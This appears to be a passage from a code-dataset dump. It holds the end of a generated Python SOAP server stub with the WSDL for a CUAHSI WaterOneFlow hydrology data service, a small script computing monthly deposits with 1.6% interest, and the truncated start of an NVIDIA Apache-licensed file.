<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"option\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"name\" type=\"s:normalizedString\"/>
<s:attribute name=\"optionID\" type=\"s:integer\"/>
<s:attribute name=\"optionCode\" type=\"s:token\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
<s:complexType name=\"UnitsType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"UnitType\" type=\"s1:UnitsTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"UnitAbbreviation\" type=\"s:string\"/>
</s:sequence>
<s:attribute name=\"UnitID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"TimePeriodType\"/>
<s:complexType name=\"TimeSingleType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"timeSingle\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"TimePeriodRealTimeType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"realTimeDataPeriod\" type=\"s:duration\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"TimeIntervalType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:TimePeriodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"beginDateTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"endDateTime\" type=\"s:dateTime\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"MethodType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MethodDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MethodLink\" type=\"s:string\"/>
</s:sequence>
<s:attribute name=\"methodID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"SourceType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Organization\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"SourceDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Metadata\" type=\"s1:MetaDataType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ContactInformation\" type=\"s1:ContactInformationType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"SourceLink\" type=\"s:anyURI\"/>
</s:sequence>
<s:attribute name=\"sourceID\" type=\"s:int\"/>
</s:complexType>
<s:complexType name=\"MetaDataType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"TopicCategory\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Title\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Abstract\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ProfileVersion\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"MetadataLink\" type=\"s:anyURI\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"ContactInformationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"ContactName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"TypeOfContact\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Phone\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Email\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Address\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"QualityControlLevelType\">
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"QualityControlLevelID\" type=\"s:int\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
<s:complexType name=\"VariablesResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variables\" type=\"s1:ArrayOfVariableInfoType\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"ArrayOfVariableInfoType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
</s:sequence>
</s:complexType>
<s:element name=\"variablesResponse\" type=\"s1:VariablesResponseType\"/>
<s:complexType name=\"TimeSeriesResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryInfo\" type=\"s1:QueryInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeSeries\" type=\"s1:TimeSeriesType\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"TimeSeriesType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sourceInfo\" type=\"s1:SourceInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"values\" type=\"s1:TsValuesSingleVariableType\"/>
</s:sequence>
<s:attribute name=\"name\" type=\"s:string\"/>
</s:complexType>
<s:complexType name=\"TsValuesSingleVariableType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"value\" type=\"s1:ValueSingleVariable\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"qualifier\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"qualifierCode\" type=\"s:token\"/>
<s:attribute name=\"qualifierID\" type=\"s:integer\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"qualityControlLevel\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"qualityControlLevelID\" type=\"s:normalizedString\"/>
</s:sequence>
<s:attribute name=\"qualityControlLevelCode\" type=\"s:string\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"timeZoneShiftApplied\" type=\"s:boolean\"/>
<s:attribute name=\"unitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"unitsCode\" type=\"s:token\"/>
<s:attribute name=\"unitsType\" type=\"s1:UnitsTypeEnum\"/>
<s:attribute name=\"count\" type=\"s:nonNegativeInteger\"/>
<s:attribute default=\"false\" name=\"unitsAreConverted\" type=\"s:boolean\"/>
</s:complexType>
<s:complexType name=\"ValueSingleVariable\">
<s:simpleContent>
<s:extension base=\"s:decimal\">
<s:attribute name=\"qualifiers\" type=\"s:string\"/>
<s:attribute name=\"censorCode\" type=\"s1:CensorCodeEnum\"/>
<s:attribute name=\"dateTime\" type=\"s:dateTime\"/>
<s:attribute name=\"qualityControlLevel\" type=\"s1:QualityControlLevelEnum\"/>
<s:attribute name=\"methodID\" type=\"s:string\"/>
<s:attribute name=\"sourceID\" type=\"s:string\"/>
<s:attribute name=\"accuracyStdDev\" type=\"s:double\"/>
<s:attribute name=\"codedVocabulary\" type=\"s:boolean\"/>
<s:attribute name=\"codedVocabularyTerm\" type=\"s:string\"/>
<s:attribute name=\"sampleID\" type=\"s:string\"/>
<s:attribute name=\"offsetValue\" type=\"s:double\"/>
<s:attribute name=\"offsetUnitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"offsetDescription\" type=\"s:string\"/>
<s:attribute name=\"offsetUnitsCode\" type=\"s:normalizedString\"/>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
<s:simpleType name=\"CensorCodeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"lt\"/>
<s:enumeration value=\"gt\"/>
<s:enumeration value=\"nc\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"QualityControlLevelEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Raw data\"/>
<s:enumeration value=\"Quality controlled data\"/>
<s:enumeration value=\"Derived products\"/>
<s:enumeration value=\"Interpreted products\"/>
<s:enumeration value=\"Knowledge products\"/>
</s:restriction>
</s:simpleType>
<s:element name=\"timeSeriesResponse\" type=\"s1:TimeSeriesResponseType\"/>
</s:schema>
</wsdl:types>
<wsdl:message name=\"GetSitesXmlSoapIn\">
<wsdl:part element=\"tns:GetSitesXml\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesXmlSoapOut\">
<wsdl:part element=\"tns:GetSitesXmlResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoSoapIn\">
<wsdl:part element=\"tns:GetSiteInfo\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoSoapOut\">
<wsdl:part element=\"tns:GetSiteInfoResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoSoapIn\">
<wsdl:part element=\"tns:GetVariableInfo\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoSoapOut\">
<wsdl:part element=\"tns:GetVariableInfoResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesSoapIn\">
<wsdl:part element=\"tns:GetSites\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSitesSoapOut\">
<wsdl:part element=\"tns:GetSitesResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoObjectSoapIn\">
<wsdl:part element=\"tns:GetSiteInfoObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetSiteInfoObjectSoapOut\">
<wsdl:part element=\"tns:GetSiteInfoObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoObjectSoapIn\">
<wsdl:part element=\"tns:GetVariableInfoObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetVariableInfoObjectSoapOut\">
<wsdl:part element=\"tns:GetVariableInfoObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesSoapIn\">
<wsdl:part element=\"tns:GetValues\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesSoapOut\">
<wsdl:part element=\"tns:GetValuesResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesObjectSoapIn\">
<wsdl:part element=\"tns:GetValuesObject\" name=\"parameters\"/>
</wsdl:message>
<wsdl:message name=\"GetValuesObjectSoapOut\">
<wsdl:part element=\"tns:GetValuesObjectResponse\" name=\"parameters\"/>
</wsdl:message>
<wsdl:portType name=\"WaterOneFlow\">
<wsdl:operation name=\"GetSitesXml\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given an array of site numbers, this method returns the site metadata for each one. Send the array of site codes in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSitesXmlSoapIn\"/>
<wsdl:output message=\"tns:GetSitesXmlSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, this method returns the site's metadata. Send the site code in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSiteInfoSoapIn\"/>
<wsdl:output message=\"tns:GetSiteInfoSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a variable code, this method returns the variable's name. Pass in the variable in this format: 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetVariableInfoSoapIn\"/>
<wsdl:output message=\"tns:GetVariableInfoSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given an array of site numbers, this method returns the site metadata for each one. Send the array of site codes in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSitesSoapIn\"/>
<wsdl:output message=\"tns:GetSitesSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, this method returns the site's metadata. Send the site code in this format: 'NetworkName:SiteCode'</wsdl:documentation>
<wsdl:input message=\"tns:GetSiteInfoObjectSoapIn\"/>
<wsdl:output message=\"tns:GetSiteInfoObjectSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a variable code, this method returns the variable's siteName. Pass in the variable in this format: 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetVariableInfoObjectSoapIn\"/>
<wsdl:output message=\"tns:GetVariableInfoObjectSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, a variable, a start date, and an end date, this method returns a time series. Pass in the sitecode and variable in this format: 'NetworkName:SiteCode' and 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetValuesSoapIn\"/>
<wsdl:output message=\"tns:GetValuesSoapOut\"/>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">Given a site number, a variable, a start date, and an end date, this method returns a time series. Pass in the sitecode and variable in this format: 'NetworkName:SiteCode' and 'NetworkName:Variable'</wsdl:documentation>
<wsdl:input message=\"tns:GetValuesObjectSoapIn\"/>
<wsdl:output message=\"tns:GetValuesObjectSoapOut\"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name=\"WaterOneFlow\" type=\"tns:WaterOneFlow\">
<soap:binding transport=\"http://schemas.xmlsoap.org/soap/http\"/>
<wsdl:operation name=\"GetSitesXml\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSitesXml\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfo\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfo\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSites\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValues\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<soap:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValuesObject\" style=\"document\"/>
<wsdl:input>
<soap:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:binding name=\"WaterOneFlow1\" type=\"tns:WaterOneFlow\">
<soap12:binding transport=\"http://schemas.xmlsoap.org/soap/http\"/>
<wsdl:operation name=\"GetSitesXml\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSitesXml\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfo\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfo\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfo\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfo\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSites\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSites\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetSiteInfoObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetVariableInfoObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValues\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValues\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name=\"GetValuesObject\">
<soap12:operation soapAction=\"http://www.cuahsi.org/his/1.0/ws/GetValuesObject\" style=\"document\"/>
<wsdl:input>
<soap12:body use=\"literal\"/>
</wsdl:input>
<wsdl:output>
<soap12:body use=\"literal\"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name=\"WaterOneFlow\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\"><div><strong>Developmental service. This service is internal CUAHSI use, and evaluation.</strong></div></wsdl:documentation>
<wsdl:port binding=\"tns:WaterOneFlow\" name=\"WaterOneFlow\">
<soap:address location=\"http://his.crwr.utexas.edu/tpwd/cuahsi_1_0.asmx\"/>
</wsdl:port>
<wsdl:port binding=\"tns:WaterOneFlow1\" name=\"WaterOneFlow1\">
<soap12:address location=\"http://his.crwr.utexas.edu/tpwd/cuahsi_1_0.asmx\"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>"""
def __init__(self, post='/tpwd/cuahsi_1_0.asmx', **kw):
ServiceSOAPBinding.__init__(self, post)
def soap_GetSitesXml(self, ps):
self.request = ps.Parse(GetSitesXmlSoapIn.typecode)
return GetSitesXmlSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSitesXml'] = 'soap_GetSitesXml'
root[(GetSitesXmlSoapIn.typecode.nspname,GetSitesXmlSoapIn.typecode.pname)] = 'soap_GetSitesXml'
def soap_GetSiteInfo(self, ps):
self.request = ps.Parse(GetSiteInfoSoapIn.typecode)
return GetSiteInfoSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSiteInfo'] = 'soap_GetSiteInfo'
root[(GetSiteInfoSoapIn.typecode.nspname,GetSiteInfoSoapIn.typecode.pname)] = 'soap_GetSiteInfo'
def soap_GetVariableInfo(self, ps):
self.request = ps.Parse(GetVariableInfoSoapIn.typecode)
return GetVariableInfoSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetVariableInfo'] = 'soap_GetVariableInfo'
root[(GetVariableInfoSoapIn.typecode.nspname,GetVariableInfoSoapIn.typecode.pname)] = 'soap_GetVariableInfo'
def soap_GetSites(self, ps):
self.request = ps.Parse(GetSitesSoapIn.typecode)
return GetSitesSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSites'] = 'soap_GetSites'
root[(GetSitesSoapIn.typecode.nspname,GetSitesSoapIn.typecode.pname)] = 'soap_GetSites'
def soap_GetSiteInfoObject(self, ps):
self.request = ps.Parse(GetSiteInfoObjectSoapIn.typecode)
return GetSiteInfoObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetSiteInfoObject'] = 'soap_GetSiteInfoObject'
root[(GetSiteInfoObjectSoapIn.typecode.nspname,GetSiteInfoObjectSoapIn.typecode.pname)] = 'soap_GetSiteInfoObject'
def soap_GetVariableInfoObject(self, ps):
self.request = ps.Parse(GetVariableInfoObjectSoapIn.typecode)
return GetVariableInfoObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetVariableInfoObject'] = 'soap_GetVariableInfoObject'
root[(GetVariableInfoObjectSoapIn.typecode.nspname,GetVariableInfoObjectSoapIn.typecode.pname)] = 'soap_GetVariableInfoObject'
def soap_GetValues(self, ps):
self.request = ps.Parse(GetValuesSoapIn.typecode)
return GetValuesSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetValues'] = 'soap_GetValues'
root[(GetValuesSoapIn.typecode.nspname,GetValuesSoapIn.typecode.pname)] = 'soap_GetValues'
def soap_GetValuesObject(self, ps):
self.request = ps.Parse(GetValuesObjectSoapIn.typecode)
return GetValuesObjectSoapOut()
soapAction['http://www.cuahsi.org/his/1.0/ws/GetValuesObject'] = 'soap_GetValuesObject'
root[(GetValuesObjectSoapIn.typecode.nspname,GetValuesObjectSoapIn.typecode.pname)] = 'soap_GetValuesObject'
def soap_GetSitesXml(self, ps):
self.request = ps.Parse(GetSitesXmlSoapIn.typecode)
return GetSitesXmlSoapOut()
soapAction[''] = 'soap_GetSitesXml'
root[(GetSitesXmlSoapIn.typecode.nspname,GetSitesXmlSoapIn.typecode.pname)] = 'soap_GetSitesXml'
def soap_GetSiteInfo(self, ps):
self.request = ps.Parse(GetSiteInfoSoapIn.typecode)
return GetSiteInfoSoapOut()
soapAction[''] = 'soap_GetSiteInfo'
root[(GetSiteInfoSoapIn.typecode.nspname,GetSiteInfoSoapIn.typecode.pname)] = 'soap_GetSiteInfo'
def soap_GetVariableInfo(self, ps):
self.request = ps.Parse(GetVariableInfoSoapIn.typecode)
return GetVariableInfoSoapOut()
soapAction[''] = 'soap_GetVariableInfo'
root[(GetVariableInfoSoapIn.typecode.nspname,GetVariableInfoSoapIn.typecode.pname)] = 'soap_GetVariableInfo'
def soap_GetSites(self, ps):
self.request = ps.Parse(GetSitesSoapIn.typecode)
return GetSitesSoapOut()
soapAction[''] = 'soap_GetSites'
root[(GetSitesSoapIn.typecode.nspname,GetSitesSoapIn.typecode.pname)] = 'soap_GetSites'
def soap_GetSiteInfoObject(self, ps):
self.request = ps.Parse(GetSiteInfoObjectSoapIn.typecode)
return GetSiteInfoObjectSoapOut()
soapAction[''] = 'soap_GetSiteInfoObject'
root[(GetSiteInfoObjectSoapIn.typecode.nspname,GetSiteInfoObjectSoapIn.typecode.pname)] = 'soap_GetSiteInfoObject'
def soap_GetVariableInfoObject(self, ps):
self.request = ps.Parse(GetVariableInfoObjectSoapIn.typecode)
return GetVariableInfoObjectSoapOut()
soapAction[''] = 'soap_GetVariableInfoObject'
root[(GetVariableInfoObjectSoapIn.typecode.nspname,GetVariableInfoObjectSoapIn.typecode.pname)] = 'soap_GetVariableInfoObject'
def soap_GetValues(self, ps):
self.request = ps.Parse(GetValuesSoapIn.typecode)
return GetValuesSoapOut()
soapAction[''] = 'soap_GetValues'
root[(GetValuesSoapIn.typecode.nspname,GetValuesSoapIn.typecode.pname)] = 'soap_GetValues'
def soap_GetValuesObject(self, ps):
self.request = ps.Parse(GetValuesObjectSoapIn.typecode)
return GetValuesObjectSoapOut()
soapAction[''] = 'soap_GetValuesObject'
root[(GetValuesObjectSoapIn.typecode.nspname,GetValuesObjectSoapIn.typecode.pname)] = 'soap_GetValuesObject'
|
990,994 | c1bb0f0a7558092b72a7fac8d5589eed1107ed36 | num = 300
final1 = num + (num * (1.6/100))
final2 = final1 + num + ((final1 + num) * (1.6/100))
final3 = final2 + num + ((final2 + num) * (1.6/100))
final4 = final3 + num + ((final3 + num) * (1.6/100))
final5 = final4 + num + ((final4 + num) * (1.6/100))
final6 = final5 + num + ((final5 + num) * (1.6/100))
final7 = final6 + num + ((final6 + num) * (1.6/100))
final8 = final7 + num + ((final7 + num) * (1.6/100))
final9 = final8 + num + ((final8 + num) * (1.6/100))
final10 = final9 + num + ((final9 + num) * (1.6/100))
final11 = final10 + num + ((final10 + num) * (1.6/100))
final12 = final11 + num + ((final11 + num) * (1.6/100))
final13 = final12 + num + ((final12 + num) * (1.6/100))
final14 = final13 + num + ((final13 + num) * (1.6/100))
final15 = final14 + num + ((final14 + num) * (1.6/100))
final16 = final15 + num + ((final15 + num) * (1.6/100))
final17 = final16 + num + ((final16 + num) * (1.6/100))
final18 = final17 + num + ((final17 + num) * (1.6/100))
final19 = final18 + num + ((final18 + num) * (1.6/100))
final20 = final19 + num + ((final19 + num) * (1.6/100))
final21 = final20 + num + ((final20 + num) * (1.6/100))
final22 = final21 + num + ((final21 + num) * (1.6/100))
final23 = final22 + num + ((final22 + num) * (1.6/100))
final24 = final23 + num + ((final23 + num) * (1.6/100))
final25 = final24 + num + ((final24 + num) * (1.6/100))
final26 = final25 + num + ((final25 + num) * (1.6/100))
final27 = final26 + num + ((final26 + num) * (1.6/100))
final28 = final27 + num + ((final27 + num) * (1.6/100))
final29 = final28 + num + ((final28 + num) * (1.6/100))
final30 = final29 + num + ((final29 + num) * (1.6/100))
final31 = final30 + num + ((final30 + num) * (1.6/100))
final32 = final31 + num + ((final31 + num) * (1.6/100))
final33 = final32 + num + ((final32 + num) * (1.6/100))
final34 = final33 + num + ((final33 + num) * (1.6/100))
final35 = final34 + num + ((final34 + num) * (1.6/100))
final36 = final35 + num + ((final35 + num) * (1.6/100))
final37 = final36 + num + ((final36 + num) * (1.6/100))
final38 = final37 + num + ((final37 + num) * (1.6/100))
final39 = final38 + num + ((final38 + num) * (1.6/100))
final40 = final39 + num + ((final39 + num) * (1.6/100))
final41 = final40 + num + ((final40 + num) * (1.6/100))
final42 = final41 + num + ((final41 + num) * (1.6/100))
final43 = final42 + num + ((final42 + num) * (1.6/100))
final44 = final43 + num + ((final43 + num) * (1.6/100))
final45 = final44 + num + ((final44 + num) * (1.6/100))
final46 = final45 + num + ((final45 + num) * (1.6/100))
final47 = final46 + num + ((final46 + num) * (1.6/100))
final48 = final47 + num + ((final47 + num) * (1.6/100))
print('-> {}'.format(final48))
|
990,995 | a77533994d1857badeb0fd4f99bb42bb25f21f30 | #!/usr/bin/env python3
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
